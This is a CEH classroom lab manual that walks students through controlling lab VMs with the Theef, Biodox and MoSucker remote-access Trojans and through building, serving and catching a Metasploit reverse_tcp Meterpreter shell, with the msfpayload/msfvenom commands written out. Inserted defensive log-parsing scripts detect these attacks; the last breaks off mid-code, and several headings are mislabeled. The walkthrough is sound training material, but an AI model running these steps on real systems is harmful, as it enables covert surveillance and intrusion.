Internet Connection Required
☐ Yes ☑ No

Platform Supported
☑ Classroom ☑ iLabs


Creating a Server Using the Theef

Theef is a Windows-based application for both the client and server end. The Theef server is a virus that you install on your victim's computer, and the Theef client is what you then use to control the virus.

ICON KEY: Valuable information | Test your knowledge | Web exercise | Workbook review

Lab Scenario
A backdoor Trojan provides remote, usually surreptitious, access to affected systems. A backdoor Trojan may be used to conduct distributed denial-of-service (DDoS) attacks, or it may be used to install additional Trojans or other forms of malicious software. For example, a backdoor Trojan may be used to install a downloader or dropper Trojan, which may in turn install a proxy Trojan used to relay spam or a keylogger Trojan, which monitors and sends keystrokes to remote attackers. A backdoor Trojan may also open ports on the affected system and thus potentially lead to further compromise by other attackers.
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry this out, you need:
■ Theef tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef


■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 as a virtual machine (Attacker)
■ Windows Server 2008 running in a virtual machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks

TASK 1: Create Server with Pro Rat

1. Launch the Windows Server 2008 virtual machine and navigate to Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.

2. Double-click Server210.exe to run the Trojan on the victim's machine.
FIGURE 8.1: Windows Server 2008-Theef Folder

3. In the Open File - Security Warning window, click Run, as shown in the following screenshot.

FIGURE 8.2: Windows Server 2008-Security Warning

4. Launch the Windows 8 virtual machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.

5. Double-click Client210.exe to access the victim machine remotely.
FIGURE 8.3: Windows 8-Running Client210.exe

6. In the Open File - Security Warning window, click Run, as shown in the following screenshot.

FIGURE 8.4: Windows 8-Security Warning

7. The main window of Theef appears, as shown in the following screenshot.

FIGURE 8.5: Theef Main Screen

8. Enter an IP address in the IP field, and leave the Port and FTP fields at their defaults.

9. In this lab we are attacking Windows Server 2008 (10.0.0.13). Click Connect after entering the IP address of Windows Server 2008.

FIGURE 8.6: Theef Connecting to Victim Machine

10. Now, in Windows 8, you have access to view the Windows Server 2008 machine remotely.

Theef connection log (from the screenshot):
[15:05:31] Attempting connection with 10.0.0.13
[15:05:31] Connection established with 10.0.0.13
[15:05:31] Connection accepted
[15:05:31] Connected to transfer port
Connected to server

FIGURE 8.7: Theef Gained access of Victim Machine

11. To view the computer information, click the Computer icon at the bottom of the window.

12. In Computer Information, you are able to view PC Details, OS Info, Home, and Network by clicking the respective buttons.

FIGURE 8.8: Theef Computer Information

13. Click the Spy icon to capture screens, keyloggers, etc. of the victim's machine.

FIGURE 8.9: Theef Spy

14. Select Keylogger to record the keystrokes of the victim.

15. In the Keylogger window, click the Play button to record the keystrokes.

FIGURE 8.9: Theef Keylogger Window

16. Now go to Windows Server 2008 and type some text in Notepad to record the keystrokes.

FIGURE 8.10: Theef recorded Key Strokes

17. Similarly, you can access the details of the victim's machine by clicking the respective icons.
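Seen from the victim's side, the session above leaves a footprint: the Theef server process holds open the Port and FTP values shown in the client window (6703 and 2968 by default) and keeps an established connection to the attacker's address. The block below is an added example, not part of the lab or of Theef, that parses `netstat -ano` output together with `tasklist`-style PID-to-image data (both constructed inline here) and flags listeners on those default ports as well as any listener owned by an image outside a site allow-list. The allow-list, the sample rows and the PID-to-image mapping are assumptions; a RAT can be rebuilt on other ports, so the owning process, not the port number, is what to investigate.

```python
"""Added example (not from the lab or from Theef): flag RAT-style listeners
in `netstat -ano` output. All sample data below is constructed."""

# Default Port / FTP values shown in the Theef client in the lab screenshots.
THEEF_DEFAULT_PORTS = {6703: "Theef control port", 2968: "Theef transfer port"}

# Constructed `netstat -ano` output (Windows column layout: Proto, Local, Foreign, State, PID).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       712
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:2968           0.0.0.0:0              LISTENING       3124
  TCP    0.0.0.0:6703           0.0.0.0:0              LISTENING       3124
  TCP    10.0.0.13:6703         10.0.0.10:49211        ESTABLISHED     3124
  TCP    10.0.0.13:3389         10.0.0.10:49150        ESTABLISHED     1180
  UDP    0.0.0.0:500            *:*                                    880
"""

# Constructed PID -> image mapping (what `tasklist` would report); the image
# name for PID 3124 is the Theef server executable listed in the lab folder.
SAMPLE_TASKLIST = {712: "svchost.exe", 4: "System", 3124: "Server210.exe",
                   1180: "svchost.exe", 880: "svchost.exe"}

# Assumption: images that are expected to listen on this host (a site baseline).
ALLOWED_LISTENERS = {"System", "svchost.exe", "lsass.exe", "services.exe"}


def parse_netstat(text):
    """Turn `netstat -ano` lines into dicts; header and blank lines are skipped.
    UDP rows have no State column, so the row length decides the layout."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = parts[0], parts[1], parts[2]
        state = parts[3] if len(parts) == 5 else ""
        host, _, port = local.rpartition(":")  # rpartition copes with [::]:port too
        rows.append({"proto": proto, "host": host, "port": int(port),
                     "foreign": foreign, "state": state, "pid": int(parts[-1])})
    return rows


def find_suspicious(rows, tasklist, allowed=ALLOWED_LISTENERS):
    """Return one finding per row that matches a Theef default port or is a
    listener owned by an image not in the allow-list, with the reasons."""
    findings = []
    for r in rows:
        image = tasklist.get(r["pid"], "<unknown>")
        reasons = []
        if r["port"] in THEEF_DEFAULT_PORTS:
            reasons.append(THEEF_DEFAULT_PORTS[r["port"]])
        if r["state"] == "LISTENING" and image not in allowed:
            reasons.append("listener owned by non-baseline image")
        if reasons:
            findings.append({"pid": r["pid"], "image": image, "port": r["port"],
                             "state": r["state"], "foreign": r["foreign"],
                             "reasons": reasons})
    return findings


def suspicious_pids(findings):
    """Distinct owning processes to pull off the box for analysis."""
    return sorted({f["pid"] for f in findings})


if __name__ == "__main__":
    for f in find_suspicious(parse_netstat(SAMPLE_NETSTAT), SAMPLE_TASKLIST):
        print(f"PID {f['pid']} ({f['image']}) port {f['port']} {f['state']} "
              f"peer {f['foreign']}: {', '.join(f['reasons'])}")
```

On the sample data all three findings point at the same PID, which is the useful output: an ESTABLISHED row on a flagged port also gives the peer address to pivot on in firewall and proxy logs. Running the real commands (`netstat -ano` and `tasklist`) on the victim and feeding their output to these functions is the obvious next step; the parser expects the Windows column layout shown.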

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Theef
Information Collected/Objectives Achieved:
Output:
Victim's machine PC information
Victim's machine keystrokes

Questions
1. Is there any way to filter out the "localhost:####" remote address entries?

2. Evaluate the other details displayed by "autoruns" and analyze the working of the autoruns tool.

Internet Connection Required
☐ Yes ☑ No

Platform Supported
☑ Classroom ☑ iLabs


Creating a Server Using the Biodox

Theef is a Windows-based application for both the client and server end. The Theef server is a virus that you install on your victim's computer, and the Theef client is what you then use to control the virus.

ICON KEY: Valuable information | Test your knowledge | Web exercise | Workbook review

Lab Scenario
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry this out, you need:
■ Biodox tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan
■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 as a virtual machine (Attacker)
■ Windows Server 2008 running in a virtual machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools


Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks

TASK 1: Create Server with Pro Rat

1. Launch the Windows 8 virtual machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.

2. Double-click BIODOX OE Edition.exe to run the Trojan on the victim's machine.
FIGURE 9.1: Windows 8-Biodox Contents

3. In the Open File - Security Warning window, click Run, as shown in the following screenshot.

FIGURE 9.2: Windows 8 - Security Warning


4. Select your preferred language from the drop-down list in the Biodox main window; in this lab we have selected English.

FIGURE 9.3: Windows 8 - Biodox main window language selection (left pane: communication, passwords, manage files, keyboard, msn settings, settings manager, system information, fun manager, commands, capture, server properties, local tools, contact us)

5. Now click the Server Editor button to build a server, as shown in the following screenshot.

FIGURE 9.4: Windows 8 - Security Warning (Biodox Server Editor with its Fake Error Message, IP/DNS, Victim Name, Connection Port, Connection Delay, Install Path, Registry Settings and Server Mode panels)

6. In Server Editor options, enter a victim's IP address in the IP/DNS field; in this lab we are using Windows Server 2008 (10.0.0.13).


7. Leave the rest of the settings at their defaults; to build a server, click the Create Server button.

Note: IP addresses may differ in your classroom labs.


FIGURE 9.5: Biodox Main Screen (Server Editor with Address 10.0.0.13, Name victim, Connection 6661, Transfer 6662, Screen Capture 6663, Webcam Capture 6664, Install Path System32, Registry Settings Key mssrs32 and Value mssrs32.exe)

8. The server.exe file will be created in its default directory: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.

FIGURE 9.5: Biodox services (server.exe in the Biodox folder)

9. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan to run the server.exe file.


FIGURE 9.6: Biodox server.exe

10. Double-click server.exe in the Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.

FIGURE 9.7: Run the tool

11. Now switch to Windows 8 Virtual Machine and click the active/deactive status button to see the connected machines.


FIGURE 9.8: Biodox open source edition (Status: Settings saved and server created)

12. After getting connected you can view connected victims as shown in the following screenshot.

FIGURE 9.9: Biodox open source edition (victim list showing IP address, user name, computer, admin, operating system, CPU, RAM and country; Status: client Active)

13. Now you can perform actions with the victim by selecting the appropriate action tab in the left pane of the Biodox window.
14. Now click the settings manager option to view the applications running and other application settings.


FIGURE 9.9: Biodox open source editor (settings manager listing the victim's processes by name, PID, path, memory and priority)

15. You can also record screenshots of the victim by clicking the Screen Capture button.

16. Click the Start Screen Capture button to capture screenshots of the victim's machine.

FIGURE 9.10: screen capture

17. Biodox displays the captured screenshot of the victim's machine.


FIGURE 9.11: screen capture

18. Similarly, you can access the details of the victim's machine by clicking the respective functions.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility | Information Collected/Objectives Achieved
Biodox | Output: Record the screenshots of the victim machine

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs


Creating a Server Using the MoSucker

MoSucker is a Visual Basic Trojan. MoSucker's edit server program has a client with the same layout as SubSeven's client.

Lab Scenario

A backdoor is a secret or unauthorized channel for accessing a computer system. In an attack scenario, hackers install backdoors on a machine, once compromised, to access it in an easier manner at later times. With the growing use of e-commerce, web applications have become the target of choice for attackers. With a backdoor, an attacker can virtually have full and undetected access to your application for a long time. It is critical to understand the ways backdoors can be installed and to take the required preventive steps.
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors.

Lab Environment
To carry this out, you need:
■ MoSucker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker
■ A computer running Windows Server 2012 as host machine


■ A computer running Windows 8 Virtual Machine (Attacker)
■ Windows Server 2008 running in Virtual Machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks
TASK 1: Create Server with ProRat
1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker.
2. Double-click the CreateServer.exe file to create a server.

FIGURE 10.1: Install createServer.exe (the MoSucker folder: AV Firewall events, cgi, plugins, runtimes, screenshots, skins, stub, CreateServer.exe, MoSucker.exe, ReadMe.txt)

3. In the Open File - Security Warning dialog box, click Run.

FIGURE 10.2: Install createServer.exe

4. The MoSucker Server Creator/Editor window appears; leave the default settings and click OK.

FIGURE 10.3: Install createServer.exe (MoSucker 3.0 Server Creator/Editor: "I want to create a stealth trojan server for a victim" selected, with options to include Msvbvm60.dll (adds 750 KB) and mswinsock.ocx (adds 50 KB, recommended), pack for minimal file size, a transport cipher key, and start configuration after creating the server)

5. Use the file name server.exe and, to save it in the same directory, click Save.

FIGURE 10.4: Save server.exe

6. MoSucker will generate a server with the complete settings in the default directory.

FIGURE 10.5: Install server progress (MoSucker 3.0 build dialog: generating server, preparing and packing two stubs, modifying file headers; Build Info: MoSucker 3.0 Public Release B)

7. Click OK in the Edit Server pop-up message.

FIGURE 10.6: Server created successfully (Server size: 158 KB. Do not repack server.)

8. In the MoSucker wizard, change the Victim's Name to Victim or leave all the settings as their defaults.


FIGURE 10.7: Give the victim machine details (Name/Port page: Victim's Name victim; Server Name(s) kernel32, msconfig, winexec32, netconfig; Extension(s) exe, pif, bat, dll, ope, com, bpq, xtr, txp; Connection Port 4288; Prevent same server multi-infections (recommended))

9. Now click Keylogger in the left pane, check the Enable off-line keylogger option, and then click Save.

10. Leave the rest of the settings as their defaults.

FIGURE 10.8: Enable the keylogger (Log Filename field and Smart Logging trigger key words: hotmail, yahoo, login, password, bank, secure, checkout, register)

11. Click OK in the EditServer pop-up message.

FIGURE 10.9: Server save file (Server saved successfully. Final server size: 158 KB)


12. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to run the server.exe file.

FIGURE 10.10: click server.exe

13. Double-click server.exe in the Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.

FIGURE 10.11: Click on Run

14. Now switch to Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to launch MoSucker.exe.
15. Double-click MoSucker.exe.

FIGURE 10.12: click on MoSucker.exe

16. In the Open File - Security Warning dialog box, click Run to launch MoSucker.

FIGURE 10.13: Run the application

17. The MoSucker main window appears, as shown in the following figure.

FIGURE 10.14: MoSucker main window (left pane: Misc stuff, Information, File related, System, Spy related, Fun stuff I, Fun stuff II, Live capture)


18. Enter the IP address of the victim and the port number you noted at the time of server configuration, and then click Connect.
19. In this lab, we have noted the Windows Server 2008 virtual machine's IP address (10.0.0.13) and port number: 4288.
Note: These might differ in your classroom labs.

FIGURE 10.15: connect to victim machine

20. Now the Connect button automatically turns to Disconnect after getting connected with the victim machine, as shown in the following screenshot.

FIGURE 10.16: connection established

21. Now click Misc stuff in the left pane, which shows the different options that an attacker can use to perform actions from his or her system.

FIGURE 10.17: setting server options

22. You can also access the victim's machine remotely by clicking Live capture in the left pane.
23. In the Live capture option click Start, which will open the remote desktop of the victim's machine.

FIGURE 10.18: start capturing (Live capture pane with Start and Settings; Make screenshot with JPEG Quality from 20% to 90%)

24. The remote desktop connection of the victim's machine is shown in the following figure.

FIGURE 10.19: capturing victim machine (Remote administration mode options: Resize window to 4:3, JPG Quality, Delay in ms 1000, Send mouseclicks, Send pressed keys, Send mousemoves, AutoUpdate pics, Fullscreen)

25. You can access files, modify the files, and so on in this mode.

FIGURE 10.20: capturing victim machine

26. Similarly, you can access the details of the victim's machine by clicking the respective functions.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility | Information Collected/Objectives Achieved
MoSucker | Output: Record the screenshots of the victim's machine

Questions
1. Evaluate and examine various methods to connect to victims if they are in different cities or countries.

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs


Hack Windows 7 Using Metasploit

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

Lab Scenario

Large companies are common targets for hackers and attackers of various kinds, and it is not uncommon for these companies to be actively monitoring traffic to and from their critical IT infrastructure. Based on the functionality of the Trojan we can safely surmise that the intent of the Trojan is to open a backdoor on a compromised computer, allowing a remote attacker to monitor activity and steal information from the compromised computer. Once installed inside a corporate network, the backdoor feature of the Trojan can also allow the attacker to use the initially compromised computer as a springboard to launch further forays into the rest of the infrastructure, meaning that the wealth of information that may be stolen could potentially be far greater than that existing on a single machine. A basic principle with all malicious programs is that they need user support to do the damage to a computer. That is the reason why Trojan horses try to deceive users by showing them some other form of email. Backdoor programs are used to gain unauthorized access to systems, and backdoor software is used by hackers to gain access to systems so that they can send in the malicious software to that particular system. Successful attacks by the hacker or attacker infecting the target environment with a customized Trojan horse (backdoor) reveal exploitable holes in the current security system.
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Creating a server and testing the network for attack

■ Attacking a network using a sample backdoor and monitoring the system activity

Lab Environment
To carry this out, you need:
■ A computer running Windows Server 2012
■ BackTrack 5 r3 running in Virtual machine
■ Windows 7 running in virtual machine (Victim machine)
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Tasks
TASK 1: Create Server Connection
1. Start BackTrack 5 virtual machine.
2. Open the terminal console by navigating to Application → BackTrack → Exploitation Tools → Network Exploitation Tools → Metasploit Framework → msfconsole
Note: You can also open a terminal with CTRL + ALT + T and type msfvenom -h to view the available options for that tool. In current Metasploit releases msfpayload has been removed and msfvenom replaces it; the msfvenom form of the command in step 3 is msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.6 -f exe -o Desktop/Backdoor.exe.


FIGURE 11.1: Selecting msfconsole from the Metasploit Framework menu


3. Type the following command in msfconsole: msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe and press Enter.

Note: 10.0.0.6 is the IP address of the BackTrack machine; LHOST is the address the payload will connect back to, so it must be reachable from the victim. The addresses may vary in your lab environment. Give the output path with a slash (Desktop/Backdoor.exe): typing Desktop Backdoor.exe makes the shell report "sh: Desktop: is a directory" and no file is produced.
FIGURE 11.2: Creating Backdoor.exe

4. This command creates a Windows executable file named Backdoor.exe and saves it on the BackTrack 5 desktop. The file is the stock Metasploit executable template carrying an unencoded payload; antivirus software on the victim will normally quarantine it on sight, so disable antivirus on the lab Windows 7 machine before continuing.

Note: The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.
FIGURE 11.3: Created Backdoor.exe file

5. Now you need to share Backdoor.exe with your victim machine (Windows 7) by following these steps:


6. Open a new BackTrack 5 terminal (CTRL+ALT+T), type mkdir /var/www/share and press Enter to create a new directory named share under the Apache document root.

FIGURE 11.4: Creating the share directory

7. Change the mode of the share folder to 755 by entering the command chmod -R 755 /var/www/share/ and pressing Enter. Mode 755 lets the Apache worker (and every other user on the system) read and traverse the directory while only the owner can write to it.

FIGURE 11.5: Changing the share folder mode to 755

8. Change the ownership of that folder to www-data by entering the command chown -R www-data:www-data /var/www/share/ and pressing Enter.



FIGURE 11.6: Change the ownership of the folder

9. Type the command ls -la /var/www/ | grep share and press Enter to verify the result. The listing should show the share directory with mode drwxr-xr-x and owner and group www-data.

FIGURE 11.7: Verifying the share directory

10. The next step is to start the Apache server: type service apache2 start in the terminal and press Enter. If Apache was already running, the command reports "httpd (pid NNNN) already running", which is fine.


Note: Payloads that Metasploit saved under /root/.msf4/data/exploits/ can be copied into the share with cp /root/.msf4/data/exploits/* /var/www/share/.

11. Now that the Apache web server is running, copy the Backdoor.exe file into the share folder: type cp /root/Desktop/Backdoor.exe /var/www/share/ and press Enter.

FIGURE 11.9: Copying Backdoor.exe into the share folder

12. Now go to the Windows 7 virtual machine, open Firefox or any web browser, type the URL http://10.0.0.6/share/ in the address bar and press Enter.

Note: Here 10.0.0.6 is the IP address of BackTrack; it may vary in your lab environment.


[Screenshot: Firefox showing the Apache directory listing "Index of /share" with the entry Backdoor.exe, last modified 23-Oct-2012 12:12, size 72K, served by Apache/2.2.14 (Ubuntu) at 10.0.0.6 port 80]
FIGURE 11.10: Firefox web browser with Backdoor.exe

13. Download the Backdoor.exe file in the Windows 7 virtual machine and save it on the desktop.

Note: If apache2 is not installed on BackTrack, run apt-get install apache2.

FIGURE 11.11: Saved Backdoor.exe on desktop
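After step 13 the Apache server on BackTrack has recorded the victim's requests in its access log. The following Python script is an added illustration, not part of the original lab: it parses Apache combined-format access log lines and reports successful downloads of executable files per client, which is how a red team confirms that a payload was fetched from the share, and how an incident responder who has obtained an attacker's staging server reconstructs who fetched it. The log lines are constructed to match this lab (client 10.0.0.5 fetching /share/Backdoor.exe) rather than copied from a real server, and the 73802-byte size is an assumption standing in for the 72K shown in the directory listing.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache "combined" log format; not taken from the lab machines.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [23/Oct/2012:12:12:01 +0530] "GET /share/ HTTP/1.1" 200 934 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/16.0"
10.0.0.5 - - [23/Oct/2012:12:12:09 +0530] "GET /share/Backdoor.exe HTTP/1.1" 200 73802 "http://10.0.0.6/share/" "Mozilla/5.0 (Windows NT 6.1) Firefox/16.0"
10.0.0.7 - - [23/Oct/2012:12:15:44 +0530] "GET /share/Backdoor.exe HTTP/1.1" 404 491 "-" "curl/7.22.0"
10.0.0.5 - - [23/Oct/2012:12:16:02 +0530] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/16.0"
"""

# client, ident, user, [timestamp], "METHOD path protocol", status, size; the referer/agent tail is ignored.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# File extensions that indicate a Windows executable or script was served.
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".bat", ".ps1", ".vbs")


def parse_access_log(text):
    """Yield one dict per parseable combined-format line; unparseable lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
        yield rec


def executable_downloads(text):
    """Return (client, path, size, timestamp) for successful (2xx) GETs of executable-looking paths.
    A 404 for the same path is deliberately left out: nothing was delivered."""
    hits = []
    for rec in parse_access_log(text):
        if (rec["method"] == "GET" and 200 <= rec["status"] < 300
                and rec["path"].lower().endswith(EXEC_SUFFIXES)):
            hits.append((rec["client"], rec["path"], rec["size"], rec["ts"]))
    return hits


def downloads_by_client(text):
    """Group delivered executable paths by client address."""
    by_client = defaultdict(list)
    for client, path, _size, _ts in executable_downloads(text):
        by_client[client].append(path)
    return dict(by_client)


if __name__ == "__main__":
    for client, path, size, ts in executable_downloads(SAMPLE_ACCESS_LOG):
        print(f"{ts} {client} fetched {path} ({size} bytes)")
```

On the BackTrack machine the real log is /var/log/apache2/access.log; pass its contents to executable_downloads() in place of the constructed sample. The size field is worth comparing against the file on disk: a truncated download (smaller size, or a 206 partial response) means the payload never ran.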

14. Switch back to the BackTrack machine.

15. In the Metasploit console, create a handler to receive the connection from the victim machine (Windows 7): type use exploit/multi/handler and press Enter.


Note: The exploit will be saved in the /root/.msf4/data/exploits/ folder.

FIGURE 11.12: Selecting exploit/multi/handler

16. To use the reverse TCP payload, type set payload windows/meterpreter/reverse_tcp and press Enter. The handler's payload must be the same one the executable was built with in step 3. With a reverse payload the victim initiates the TCP connection to the attacker, so it works through NAT and firewalls that block inbound connections to the victim.

FIGURE 11.13: Setting the reverse TCP payload

17. To set the local IP address that will catch the reverse connection, type set lhost 10.0.0.6 (the BackTrack IP address) and press Enter. It must match the LHOST the payload was built with in step 3. The listening port (LPORT) defaults to 4444; set lport <port> only if you changed it when building the payload.


FIGURE 11.14: Setting the local IP address (LHOST)

18. To start the handler, type exploit -j -z and press Enter. The -j flag runs the handler as a background job and -z tells Metasploit not to drop you into a session as soon as one opens. The console should report:
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.0.6:4444
[*] Starting the payload handler...

FIGURE 11.15: Starting the handler for the Windows 7 machine

19. Now switch to the victim machine (Windows 7) and double-click the Backdoor.exe file that you downloaded to run it.

20. Switch back to the BackTrack machine. The handler reports the incoming connection and opens a Meterpreter session, as shown in the following figure.


[Screenshot: the msfconsole handler output, ending with:
[*] Sending stage (752128 bytes) to 10.0.0.5
[*] Meterpreter session 1 opened (10.0.0.6:4444 -> 10.0.0.5:49458)]

FIGURE 11.16: Exploit result of Windows 7 machine

Note: To interact with an available session, use sessions -i <session id>.

21. To interact with the available session, type sessions -i 1 and press Enter. If Metasploit replies "Invalid session id", the payload was run more than once or an earlier session was closed and the numbering has moved on; type sessions -l to list the open sessions and use the id shown there.

FIGURE 11.17: Interacting with the session

22. Enter the command shell and press Enter. This drops from the Meterpreter prompt into a Windows command prompt running on the victim.


[Screenshot: the Meterpreter session after the shell command:
meterpreter > shell
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Admin\Desktop>]

FIGURE 11.18: Type the shell command

23. Type the dir command and press Enter. It lists the contents of the current directory on the victim machine (Windows 7). That directory is C:\Users\Admin\Desktop, the folder Backdoor.exe was launched from, because the shell inherits the working directory of the process that connected back.

[Screenshot: dir output in the remote shell:
C:\Users\Admin\Desktop>dir
 Volume in drive C has no label.

 Directory of C:\Users\Admin\Desktop
...]

FIGURE 11.19: Checking the directories of Windows 7
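The lab shows the attack from the BackTrack side; the same session leaves artifacts on the victim that a security administrator can look for. The Python script below is an added example rather than part of the lab: it parses the output of netstat -ano on the Windows 7 victim, joins each established connection to its process image path, and flags connections that go to a common Metasploit handler port (4444 is the default LPORT) or that originate from an executable in a user-writable location such as the Desktop. The netstat lines, the PID-to-image mapping and the list of handler ports are constructed for illustration. The port heuristic alone is weak, since a handler listening on 443 would pass it, which is why the path check is kept as a second, independent signal.

```python
import re
from collections import namedtuple

Conn = namedtuple("Conn", "proto laddr lport raddr rport state pid")

# Constructed sample of `netstat -ano` output on the Windows 7 victim (not captured from the lab).
# PID 2516 stands for the Backdoor.exe process connected back to the BackTrack handler.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    10.0.0.5:49458         10.0.0.6:4444          ESTABLISHED     2516
  TCP    10.0.0.5:49460         93.184.216.34:443      ESTABLISHED     1892
  TCP    127.0.0.1:49157        127.0.0.1:49158        ESTABLISHED     3020
  UDP    0.0.0.0:5355           *:*                                    1004
"""

# Constructed PID -> image path mapping, as `wmic process get ProcessId,ExecutablePath` would report.
SAMPLE_PROCESSES = {
    716: r"C:\Windows\System32\svchost.exe",
    2516: r"C:\Users\Admin\Desktop\Backdoor.exe",
    1892: r"C:\Program Files\Mozilla Firefox\firefox.exe",
    3020: r"C:\Windows\System32\svchost.exe",
    1004: r"C:\Windows\System32\svchost.exe",
}

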